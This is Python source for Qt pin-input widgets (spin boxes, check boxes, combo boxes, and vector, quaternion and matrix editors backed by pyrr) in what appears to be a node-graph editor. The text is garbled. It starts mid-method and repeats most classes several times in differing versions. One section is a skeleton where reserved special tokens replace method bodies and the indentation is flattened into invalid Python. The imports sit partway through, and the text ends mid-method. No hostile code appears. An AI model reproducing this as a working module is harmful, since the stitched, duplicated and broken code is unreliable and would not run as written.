            for col in (1, 2, 3, 4):
                name = 'm{}{}'.format(row, col)
                getattr(self, 'dsb' + name).setValue(getattr(val, name))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BoolInputWidget(InputWidgetSingle):
<|reserved_special_token_0|>
def __init__(self, parent=None, **kwds):
super(BoolInputWidget, self).__init__(parent=parent, **kwds)
self.cb = QCheckBox(self)
self.setWidget(self.cb)
self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(
val)))
<|reserved_special_token_0|>
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Vector3 through three spin boxes."""

    def __init__(self, **kwds):
        super(FloatVector3InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each axis pushes a full vector with only its own component replaced.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Vector3 from the current spin box values."""
        return pyrr.Vector3([box.value() for box in
                             (self.dsbX, self.dsbY, self.dsbZ)])

    def _configSpinBoxes(self):
        # Shared precision/range/step configuration for every axis.
        for box in (self.dsbX, self.dsbY, self.dsbZ):
            box.setDecimals(FLOAT_DECIMALS)
            box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            box.setSingleStep(FLOAT_SINGLE_STEP)

    def _onDataChangedX(self, val):
        vec = self.asDataTypeClass()
        vec.x = val
        self.dataSetCallback(vec)

    def _onDataChangedY(self, val):
        vec = self.asDataTypeClass()
        vec.y = val
        self.dataSetCallback(vec)

    def _onDataChangedZ(self, val):
        vec = self.asDataTypeClass()
        vec.z = val
        self.dataSetCallback(vec)

    def setWidgetValue(self, val):
        """Mirror *val*'s components into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Vector4 through four spin boxes."""

    def __init__(self, **kwds):
        super(FloatVector4InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each axis pushes a full vector with only its own component replaced.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.dsbW.valueChanged.connect(self._onDataChangedW)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Vector4 from the current spin box values."""
        return pyrr.Vector4([box.value() for box in
                             (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)])

    def _configSpinBoxes(self):
        # Shared range/step/precision configuration for every axis.
        for box in (self.dsbX, self.dsbY, self.dsbZ, self.dsbW):
            box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            box.setSingleStep(FLOAT_SINGLE_STEP)
            box.setDecimals(FLOAT_DECIMALS)

    def _onDataChangedX(self, val):
        vec = self.asDataTypeClass()
        vec.x = val
        self.dataSetCallback(vec)

    def _onDataChangedY(self, val):
        vec = self.asDataTypeClass()
        vec.y = val
        self.dataSetCallback(vec)

    def _onDataChangedZ(self, val):
        vec = self.asDataTypeClass()
        vec.z = val
        self.dataSetCallback(vec)

    def _onDataChangedW(self, val):
        vec = self.asDataTypeClass()
        vec.w = val
        self.dataSetCallback(vec)

    def setWidgetValue(self, val):
        """Mirror *val*'s components into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
        self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
    """Input widget that edits a pyrr.Quaternion (x, y, z, w)."""

    def __init__(self, **kwds):
        super(QuatInputWidget, self).__init__(**kwds)

    def asDataTypeClass(self):
        """Build a pyrr.Quaternion from the current spin box values."""
        components = [box.value() for box in
                      (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)]
        return pyrr.Quaternion(components)
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Matrix33 through a 3x3 spin box grid."""

    def __init__(self, parent=None, **kwds):
        super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every cell's spin box to its dedicated change handler.
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                spinBox = getattr(self, 'dsbm{}{}'.format(row, col))
                handler = getattr(self, 'm{}{}Changed'.format(row, col))
                spinBox.valueChanged.connect(handler)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Matrix33 from the current spin box values."""
        rows = []
        for row in (1, 2, 3):
            rows.append([getattr(self, 'dsbm{}{}'.format(row, col)).value()
                         for col in (1, 2, 3)])
        return pyrr.Matrix33(rows)

    def _configSpinBoxes(self):
        # Shared range/step/precision for every cell in the grid.
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                box = getattr(self, 'dsbm{}{}'.format(row, col))
                box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
                box.setSingleStep(FLOAT_SINGLE_STEP)
                box.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, attr, val):
        # Rebuild the matrix from the UI, then overwrite the edited cell.
        matrix = self.asDataTypeClass()
        setattr(matrix, attr, val)
        self.dataSetCallback(matrix)

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def setWidgetValue(self, val):
        """Mirror every component of *val* into its spin box."""
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                name = 'm{}{}'.format(row, col)
                getattr(self, 'dsb' + name).setValue(getattr(val, name))
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Matrix44 through a 4x4 spin box grid."""

    def __init__(self, parent=None, **kwds):
        super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every cell's spin box to its dedicated change handler.
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                spinBox = getattr(self, 'dsbm{}{}'.format(row, col))
                handler = getattr(self, 'm{}{}Changed'.format(row, col))
                spinBox.valueChanged.connect(handler)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Matrix44 from the current spin box values."""
        rows = []
        for row in (1, 2, 3, 4):
            rows.append([getattr(self, 'dsbm{}{}'.format(row, col)).value()
                         for col in (1, 2, 3, 4)])
        return pyrr.Matrix44(rows)

    def _configSpinBoxes(self):
        # Shared range/step/precision for every cell in the grid.
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                box = getattr(self, 'dsbm{}{}'.format(row, col))
                box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
                box.setSingleStep(FLOAT_SINGLE_STEP)
                box.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, attr, val):
        # Rebuild the matrix from the UI, then overwrite the edited cell.
        matrix = self.asDataTypeClass()
        setattr(matrix, attr, val)
        self.dataSetCallback(matrix)

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m14Changed(self, val):
        self._componentChanged('m14', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m24Changed(self, val):
        self._componentChanged('m24', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def m34Changed(self, val):
        self._componentChanged('m34', val)

    def m41Changed(self, val):
        self._componentChanged('m41', val)

    def m42Changed(self, val):
        self._componentChanged('m42', val)

    def m43Changed(self, val):
        self._componentChanged('m43', val)

    def m44Changed(self, val):
        self._componentChanged('m44', val)

    def setWidgetValue(self, val):
        """Mirror every component of *val* into its spin box."""
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                name = 'm{}{}'.format(row, col)
                getattr(self, 'dsb' + name).setValue(getattr(val, name))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EnumInputWidget(InputWidgetSingle):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class FloatInputWidget(InputWidgetSingle):
    """Input widget for a single floating point value."""

    def __init__(self, parent=None, **kwds):
        super(FloatInputWidget, self).__init__(parent=parent, **kwds)
        self.sb = QDoubleSpinBox(self)
        _configDoubleSpinBox(self.sb)
        self.setWidget(self.sb)
        # Forward every edit straight to the data-set callback.
        self.sb.valueChanged.connect(lambda value: self.dataSetCallback(value))

    def setWidgetValue(self, val):
        """Show *val* in the spin box, coercing to float."""
        self.sb.setValue(float(val))
class IntInputWidget(InputWidgetSingle):
    """Input widget for a single integer value."""

    def __init__(self, parent=None, **kwds):
        super(IntInputWidget, self).__init__(parent=parent, **kwds)
        self.sb = QSpinBox(self)
        _configIntSpinBox(self.sb)
        self.setWidget(self.sb)
        # Forward every edit straight to the data-set callback.
        self.sb.valueChanged.connect(lambda value: self.dataSetCallback(value))

    def setWidgetValue(self, val):
        """Show *val* in the spin box, coercing to int."""
        self.sb.setValue(int(val))
class NoneInputWidget(InputWidgetSingle):
    """Disabled line-edit widget: the value is displayed but not editable."""

    def __init__(self, parent=None, **kwds):
        super(NoneInputWidget, self).__init__(parent=parent, **kwds)
        self.le = QLineEdit(self)
        self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.setWidget(self.le)
        self.le.textChanged.connect(lambda text: self.dataSetCallback(text))
        # The field only displays the value; user editing is disabled.
        self.le.setEnabled(False)

    def setWidgetValue(self, val):
        """Display the string form of *val*."""
        self.le.setText(str(val))
class StringInputWidget(InputWidgetSingle):
    """Line-edit input widget for string values."""

    def __init__(self, parent=None, **kwds):
        super(StringInputWidget, self).__init__(parent=parent, **kwds)
        self.le = QLineEdit(self)
        self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.setWidget(self.le)
        # Forward every edit straight to the data-set callback.
        self.le.textChanged.connect(lambda text: self.dataSetCallback(text))

    def setWidgetValue(self, val):
        """Display the string form of *val*."""
        self.le.setText(str(val))
class BoolInputWidget(InputWidgetSingle):
    """Check-box input widget for boolean values."""

    def __init__(self, parent=None, **kwds):
        super(BoolInputWidget, self).__init__(parent=parent, **kwds)
        self.cb = QCheckBox(self)
        self.setWidget(self.cb)
        # Qt reports an int check state; collapse it to a plain bool.
        self.cb.stateChanged.connect(
            lambda state: self.dataSetCallback(bool(state)))

    def setWidgetValue(self, val):
        """Check or uncheck the box according to *val*'s truthiness."""
        state = QtCore.Qt.Checked if bool(val) else QtCore.Qt.Unchecked
        self.cb.setCheckState(state)
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Vector3 through three spin boxes."""

    def __init__(self, **kwds):
        super(FloatVector3InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each axis pushes a full vector with only its own component replaced.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Vector3 from the current spin box values."""
        return pyrr.Vector3([box.value() for box in
                             (self.dsbX, self.dsbY, self.dsbZ)])

    def _configSpinBoxes(self):
        # Shared precision/range/step configuration for every axis.
        for box in (self.dsbX, self.dsbY, self.dsbZ):
            box.setDecimals(FLOAT_DECIMALS)
            box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            box.setSingleStep(FLOAT_SINGLE_STEP)

    def _onDataChangedX(self, val):
        vec = self.asDataTypeClass()
        vec.x = val
        self.dataSetCallback(vec)

    def _onDataChangedY(self, val):
        vec = self.asDataTypeClass()
        vec.y = val
        self.dataSetCallback(vec)

    def _onDataChangedZ(self, val):
        vec = self.asDataTypeClass()
        vec.z = val
        self.dataSetCallback(vec)

    def setWidgetValue(self, val):
        """Mirror *val*'s components into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Vector4 through four spin boxes."""

    def __init__(self, **kwds):
        super(FloatVector4InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each axis pushes a full vector with only its own component replaced.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.dsbW.valueChanged.connect(self._onDataChangedW)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Vector4 from the current spin box values."""
        return pyrr.Vector4([box.value() for box in
                             (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)])

    def _configSpinBoxes(self):
        # Shared range/step/precision configuration for every axis.
        for box in (self.dsbX, self.dsbY, self.dsbZ, self.dsbW):
            box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            box.setSingleStep(FLOAT_SINGLE_STEP)
            box.setDecimals(FLOAT_DECIMALS)

    def _onDataChangedX(self, val):
        vec = self.asDataTypeClass()
        vec.x = val
        self.dataSetCallback(vec)

    def _onDataChangedY(self, val):
        vec = self.asDataTypeClass()
        vec.y = val
        self.dataSetCallback(vec)

    def _onDataChangedZ(self, val):
        vec = self.asDataTypeClass()
        vec.z = val
        self.dataSetCallback(vec)

    def _onDataChangedW(self, val):
        vec = self.asDataTypeClass()
        vec.w = val
        self.dataSetCallback(vec)

    def setWidgetValue(self, val):
        """Mirror *val*'s components into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
        self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
    """Input widget that edits a pyrr.Quaternion (x, y, z, w)."""

    def __init__(self, **kwds):
        super(QuatInputWidget, self).__init__(**kwds)

    def asDataTypeClass(self):
        """Build a pyrr.Quaternion from the current spin box values."""
        components = [box.value() for box in
                      (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)]
        return pyrr.Quaternion(components)
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Matrix33 through a 3x3 spin box grid."""

    def __init__(self, parent=None, **kwds):
        super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every cell's spin box to its dedicated change handler.
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                spinBox = getattr(self, 'dsbm{}{}'.format(row, col))
                handler = getattr(self, 'm{}{}Changed'.format(row, col))
                spinBox.valueChanged.connect(handler)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Matrix33 from the current spin box values."""
        rows = []
        for row in (1, 2, 3):
            rows.append([getattr(self, 'dsbm{}{}'.format(row, col)).value()
                         for col in (1, 2, 3)])
        return pyrr.Matrix33(rows)

    def _configSpinBoxes(self):
        # Shared range/step/precision for every cell in the grid.
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                box = getattr(self, 'dsbm{}{}'.format(row, col))
                box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
                box.setSingleStep(FLOAT_SINGLE_STEP)
                box.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, attr, val):
        # Rebuild the matrix from the UI, then overwrite the edited cell.
        matrix = self.asDataTypeClass()
        setattr(matrix, attr, val)
        self.dataSetCallback(matrix)

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def setWidgetValue(self, val):
        """Mirror every component of *val* into its spin box."""
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                name = 'm{}{}'.format(row, col)
                getattr(self, 'dsb' + name).setValue(getattr(val, name))
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
    """Matrix44 data input widget.

    Shows one double spin box per component of a 4x4 matrix; editing any
    component rebuilds the full ``pyrr.Matrix44`` and hands it to
    ``dataSetCallback``.
    """

    # Row-major component names; the designer .ui file provides a matching
    # ``dsb<name>`` spin box for each.
    _COMPONENTS = ('m11', 'm12', 'm13', 'm14',
                   'm21', 'm22', 'm23', 'm24',
                   'm31', 'm32', 'm33', 'm34',
                   'm41', 'm42', 'm43', 'm44')

    def __init__(self, parent=None, **kwds):
        super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every spin box to its per-component slot. The slots are kept
        # as named public methods for backward compatibility.
        for name in self._COMPONENTS:
            getattr(self, 'dsb' + name).valueChanged.connect(
                getattr(self, name + 'Changed'))
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Matrix44``."""
        rows = [[getattr(self, 'dsbm%d%d' % (r, c)).value()
                 for c in (1, 2, 3, 4)]
                for r in (1, 2, 3, 4)]
        return pyrr.Matrix44(rows)

    def _configSpinBoxes(self):
        # Apply the shared float range/step/precision to all sixteen boxes.
        for name in self._COMPONENTS:
            sb = getattr(self, 'dsb' + name)
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, name, val):
        # Rebuild the matrix, overwrite the edited component and notify.
        m = self.asDataTypeClass()
        setattr(m, name, val)
        self.dataSetCallback(m)

    # --- per-component slots (public names preserved for existing callers) ---

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m14Changed(self, val):
        self._componentChanged('m14', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m24Changed(self, val):
        self._componentChanged('m24', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def m34Changed(self, val):
        self._componentChanged('m34', val)

    def m41Changed(self, val):
        self._componentChanged('m41', val)

    def m42Changed(self, val):
        self._componentChanged('m42', val)

    def m43Changed(self, val):
        self._componentChanged('m43', val)

    def m44Changed(self, val):
        self._componentChanged('m44', val)

    def setWidgetValue(self, val):
        """Push ``val`` (a ``pyrr.Matrix44``) component-wise into the boxes."""
        for name in self._COMPONENTS:
            getattr(self, 'dsb' + name).setValue(getattr(val, name))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import weakref
from Qt import QtCore
from Qt import QtGui
from Qt.QtWidgets import QDoubleSpinBox
from Qt.QtWidgets import QSpinBox
from Qt.QtWidgets import QWidget
from Qt.QtWidgets import QSpacerItem
from Qt.QtWidgets import QPushButton
from Qt.QtWidgets import QComboBox
from Qt.QtWidgets import QLineEdit
from Qt.QtWidgets import QCheckBox
from Qt.QtWidgets import QGraphicsProxyWidget
from Qt.QtWidgets import QGridLayout
from Qt.QtWidgets import QHBoxLayout
from Qt.QtWidgets import QSizePolicy
from AGraphCommon import *
from AbstractGraph import PinBase
from ..Ui import FloatVector3InputWidget_ui
from ..Ui import FloatVector4InputWidget_ui
from ..Ui import Matrix33InputWidget_ui
from ..Ui import Matrix44InputWidget_ui
import pyrr
def _configDoubleSpinBox(sb):
    """Apply the project-wide float range, step and precision to *sb*."""
    sb.setDecimals(FLOAT_DECIMALS)
    sb.setSingleStep(FLOAT_SINGLE_STEP)
    sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
def _configIntSpinBox(sb):
    # Widen the given QSpinBox to the project-wide integer range.
    sb.setRange(INT_RANGE_MIN, INT_RANGE_MAX)
class InputWidgetRaw(QWidget):
    """Base class for pin input widgets built from complex designer forms.

    Stores the pin's default value and the setter callable that pushes
    edited data back onto the pin.
    """

    def __init__(self, parent=None, dataSetCallback=None, defaultValue=None,
                 userStructClass=None, **kwds):
        super(InputWidgetRaw, self).__init__(parent=parent, **kwds)
        self._defaultValue = defaultValue
        # Callable with signature void(object); forwards edited data to the pin.
        self.dataSetCallback = dataSetCallback

    def onResetValue(self):
        """Restore the widget to the pin's default value."""
        self.setWidgetValue(self._defaultValue)

    def setWidgetValue(self, value):
        """Write *value* into the widget controls (overridden by subclasses)."""
        pass

    def widgetValueUpdated(self, value):
        """Handle a value edited in the widget (overridden by subclasses)."""
        pass
class InputWidgetSingle(InputWidgetRaw):
    """
    Base class for single-control input widgets (spin boxes, check boxes,
    line edits etc.). Builds a horizontal layout containing the control
    itself (inserted later via :meth:`setWidget`) followed by a stretch
    spacer and a reset button that restores the default value.
    """
    def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
        super(InputWidgetSingle, self).__init__(parent=parent, dataSetCallback=dataSetCallback, defaultValue=defaultValue, userStructClass=userStructClass, **kwds)
        # Flag tracking whether the value came from the widget itself.
        self.bWidgetSet = False
        # Outer grid layout hosting the single horizontal row of controls.
        self.gridLayout = QGridLayout(self)
        self.gridLayout.setSpacing(1)
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setObjectName("gridLayout")
        self.horizontalLayout = QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        # Expanding spacer keeps the control left-aligned and pushes the
        # reset button to the right edge.
        spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        # Small icon-only button that restores the pin's default value.
        self.pbReset = QPushButton(self)
        self.pbReset.setMaximumSize(QtCore.QSize(25, 25))
        self.pbReset.setText("")
        self.pbReset.setObjectName("pbReset")
        self.pbReset.setIcon(QtGui.QIcon(":/icons/resources/reset.png"))
        self.horizontalLayout.addWidget(self.pbReset)
        self.pbReset.clicked.connect(self.onResetValue)
        self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
        # Position at which setWidget() inserts the actual control
        # (before the spacer and reset button).
        self._index = 0
    def setWidget(self, widget):
        # Insert the concrete input control at the front of the row.
        self.horizontalLayout.insertWidget(self._index, widget)
class ExecInputWidget(InputWidgetSingle):
    """Push-button widget for execution (exec) pins.

    Clicking the button fires ``dataSetCallback``; an exec pin has no
    value to reset, so the reset button is removed.
    """

    def __init__(self, parent=None, **kwds):
        super(ExecInputWidget, self).__init__(parent=parent, **kwds)
        button = QPushButton('execute', self)
        self.pb = button
        self.setWidget(button)
        button.clicked.connect(self.dataSetCallback)
        # No data to reset on an exec pin; drop the inherited reset button.
        self.pbReset.deleteLater()

    def setObjectName(self, name):
        super(ExecInputWidget, self).setObjectName(name)
        # Label the button with the last component of the dotted name.
        self.pb.setText(name.rsplit(".", 1)[-1])
class EnumInputWidget(InputWidgetSingle):
    """Combo-box widget for enum-typed pins.

    One combo entry is created per member of the enum class passed as
    ``userStructClass``; selecting an entry emits its index to the pin.
    """

    def __init__(self, parent=None, **kwds):
        super(EnumInputWidget, self).__init__(parent=parent, **kwds)
        self.cb = QComboBox(self)
        self.setWidget(self.cb)
        # Item text is the member name; item data carries the raw value.
        for member in list(kwds['userStructClass']):
            self.cb.addItem(member.name, member.value)
        self.cb.currentIndexChanged[int].connect(self.dataSetCallback)

    def setWidgetValue(self, val):
        self.cb.setCurrentIndex(val)
class FloatInputWidget(InputWidgetSingle):
    """Double spin-box widget for floating point pins."""

    def __init__(self, parent=None, **kwds):
        super(FloatInputWidget, self).__init__(parent=parent, **kwds)
        spinBox = QDoubleSpinBox(self)
        _configDoubleSpinBox(spinBox)
        self.sb = spinBox
        self.setWidget(spinBox)
        # Forward every spin-box edit straight to the pin setter.
        spinBox.valueChanged.connect(lambda val: self.dataSetCallback(val))

    def setWidgetValue(self, val):
        self.sb.setValue(float(val))
class IntInputWidget(InputWidgetSingle):
    """Spin-box widget for integer pins."""

    def __init__(self, parent=None, **kwds):
        super(IntInputWidget, self).__init__(parent=parent, **kwds)
        spinBox = QSpinBox(self)
        _configIntSpinBox(spinBox)
        self.sb = spinBox
        self.setWidget(spinBox)
        # Forward every spin-box edit straight to the pin setter.
        spinBox.valueChanged.connect(lambda val: self.dataSetCallback(val))

    def setWidgetValue(self, val):
        self.sb.setValue(int(val))
class NoneInputWidget(InputWidgetSingle):
    """Read-only line-edit widget for pins with no dedicated editor."""

    def __init__(self, parent=None, **kwds):
        super(NoneInputWidget, self).__init__(parent=parent, **kwds)
        lineEdit = QLineEdit(self)
        lineEdit.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.le = lineEdit
        self.setWidget(lineEdit)
        lineEdit.textChanged.connect(lambda val: self.dataSetCallback(val))
        # Display only: the user cannot type into this field.
        lineEdit.setEnabled(False)

    def setWidgetValue(self, val):
        self.le.setText(str(val))
class StringInputWidget(InputWidgetSingle):
    """Line-edit widget for string pins."""

    def __init__(self, parent=None, **kwds):
        super(StringInputWidget, self).__init__(parent=parent, **kwds)
        lineEdit = QLineEdit(self)
        lineEdit.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.le = lineEdit
        self.setWidget(lineEdit)
        # Forward every keystroke's resulting text to the pin setter.
        lineEdit.textChanged.connect(lambda val: self.dataSetCallback(val))

    def setWidgetValue(self, val):
        self.le.setText(str(val))
class BoolInputWidget(InputWidgetSingle):
    """Check-box widget for boolean pins."""

    def __init__(self, parent=None, **kwds):
        super(BoolInputWidget, self).__init__(parent=parent, **kwds)
        self.cb = QCheckBox(self)
        self.setWidget(self.cb)
        # Qt reports the raw check state; coerce it to a plain bool.
        self.cb.stateChanged.connect(
            lambda state: self.dataSetCallback(bool(state)))

    def setWidgetValue(self, val):
        state = QtCore.Qt.Checked if bool(val) else QtCore.Qt.Unchecked
        self.cb.setCheckState(state)
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
    """Three double spin boxes editing a pyrr.Vector3."""

    def __init__(self, **kwds):
        super(FloatVector3InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a pyrr.Vector3."""
        return pyrr.Vector3(
            [sb.value() for sb in (self.dsbX, self.dsbY, self.dsbZ)])

    def _configSpinBoxes(self):
        # All three boxes share the project-wide float settings.
        for sb in (self.dsbX, self.dsbY, self.dsbZ):
            sb.setDecimals(FLOAT_DECIMALS)
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)

    def _emitWithComponent(self, axis, val):
        # Rebuild the vector, overwrite one axis and notify the pin.
        v = self.asDataTypeClass()
        setattr(v, axis, val)
        self.dataSetCallback(v)

    def _onDataChangedX(self, val):
        self._emitWithComponent('x', val)

    def _onDataChangedY(self, val):
        self._emitWithComponent('y', val)

    def _onDataChangedZ(self, val):
        self._emitWithComponent('z', val)

    def setWidgetValue(self, val):
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
    """Four double spin boxes editing a pyrr.Vector4."""

    def __init__(self, **kwds):
        super(FloatVector4InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.dsbW.valueChanged.connect(self._onDataChangedW)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a pyrr.Vector4."""
        return pyrr.Vector4(
            [sb.value() for sb in (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)])

    def _configSpinBoxes(self):
        # All four boxes share the project-wide float settings.
        for sb in (self.dsbX, self.dsbY, self.dsbZ, self.dsbW):
